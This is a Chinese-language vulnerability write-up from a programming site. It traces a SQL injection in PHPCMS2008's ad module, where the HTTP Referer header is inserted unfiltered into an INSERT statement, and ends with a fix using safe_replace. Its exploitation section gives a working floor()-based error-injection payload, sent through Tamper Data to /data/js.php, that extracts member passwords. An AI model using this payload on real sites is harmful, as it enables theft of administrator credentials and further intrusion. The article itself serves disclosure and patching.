程序師世界是廣大編程愛好者互助、分享、學習的平台,程序師世界有你更精彩!
首頁
編程語言
C語言|JAVA編程
Python編程
網頁編程
ASP編程|PHP編程
JSP編程
數據庫知識
MYSQL數據庫|SqlServer數據庫
Oracle數據庫|DB2數據庫
 程式師世界 >> 編程語言 >> 網頁編程 >> PHP編程 >> PHP綜合 >> PHPCMS2008廣告模板SQL注入漏洞修復

PHPCMS2008廣告模板SQL注入漏洞修復

編輯:PHP綜合

00 漏洞描述

PHPCMS2008由於廣告模塊取referer不嚴,導致一處sql注入漏洞.可以得到管理員用戶名與密碼,攻擊者登錄後台後可能會獲取webshell,對服務器進行進一步的滲透。

01 漏洞分析

漏洞產生的位置:

/ads/include/ads_place.class.php的show方法中.

function show($placeid)
...
if($adses[0]['option'])
{
foreach($adses as $ads)
{
$contents[] = ads_content($ads, 1);
$this->db->query(“INSERT INTO$this->stat_table(`adsid`,`username`,`ip`,`referer`,`clicktime`,`type`)VALUES (‘$ads[adsid]','$_username','$ip',‘$this->referrer',‘$time',,'0')”);
$template = $ads['template'] ? $ads['template'] : 'ads';
}
}
...

sql語句中

$this->db->query(“INSERT INTO$this->stat_table(`adsid`,`username`,`ip`,`referer`,`clicktime`,`type`)VALUES (‘$ads[adsid]','$_username','$ip',‘$this->referrer',‘$time',,'0')”);

這裡$this->referrer通過this方法直接將HTTP請求頭中的referer字段插入到數據庫中,沒有做任何過濾措施。(這個this方法是PHPCMS裡面直接封裝的)。

所以現在已經找到漏洞點,下一步就是找包含漏洞的用戶可控的頁面。如果漏洞是用戶不可控的,比如只能管理員利用,那就相當的雞肋了。

這裡使用回溯的方法,看看哪些頁面調用了它。

頁面/ads/include/commom.inc.php

<?php 
...
require MOD_ROOT.'include/ads_place.class.php';
require MOD_ROOT.'include/ads.class.php';
...
?>

在往上看看誰調用了/ads/include/commom.inc.php

/ads/ad.php文件中

<?php
...
require './include/common.inc.php';
...
?>

ad.php文件為用戶可控文件,但ad.php有時不能訪問,繼續向上查找/data/js.php

<?php
chdir(‘../ads/');
require ‘./ad.php';
?>

在用戶訪問首頁時,會調用js.php,通過該文件可以提交有害字段,然後通過逐層調用,傳入字段referer到危險方法show,引入SQL注入攻擊。

02 漏洞利用

修改請求頭中的referer字段的話有很多種,比如burpsuite,Tamper Data…

這裡直接使用火狐的Tamper Data進行修改:

點擊Start Tamper,然後訪問http://your-addr/data/js.php?id=1

這時候Tamper Data會跳出來,在右邊框內,點擊右鍵,添加一個element值填寫payload

referer=1', (SELECT 1 FROM (select count(*), concat(floor(rand(0)*2),char(45,45,45),(SELECT password from phpcms_member limit 1))a from information_schema.tables group by a)b), ‘0')#

這裡我解釋一下:因為漏洞的sql語句是INSERT是不回顯的,所以可以使用盲注,這裡的payload使用的floor報錯注入。floor報錯注入原理請參考:floor函數用法

把這個payload帶入sql語句中是:

$this->db->query(“INSERT INTO$this->stat_table(`adsid`,`username`,`ip`,`referer`,`clicktime`,`type`)VALUES (‘$ads[adsid]','$_username','$ip',‘1',‘$time',(SELECT 1 FROM (select count(*), concat(floor(rand(0)*2),char(45,45,45),(SELECT password from phpcms_member limit 1))a from information_schema.tables group by a)b), ‘0')#,'0')”);

03 漏洞修復

對相關字段進行過濾處理。

$referer = safe_replace($this->referer);
$this->db->query("INSERT INTO $this->stat_table (`adsid`, `username`, `ip`, `referer`, `clicktime`, `type`) VALUES ('$ads[adsid]', '$_username', '$ip', '$referer', '$time', '0')");
$template = $ads['template'] ? $ads['template'] : 'ads';

這裡safe_replace是PHPCMS2008封裝的過濾函數。

以上所述是小編給大家介紹的PHPCMS2008廣告模板SQL注入漏洞,希望對大家有所幫助,如果大家有任何疑問請給我留言,小編會及時回復大家的。在此也非常感謝大家對網站的支持!

  1. 上一頁:
  2. 下一頁:
Copyright © 程式師世界 All Rights Reserved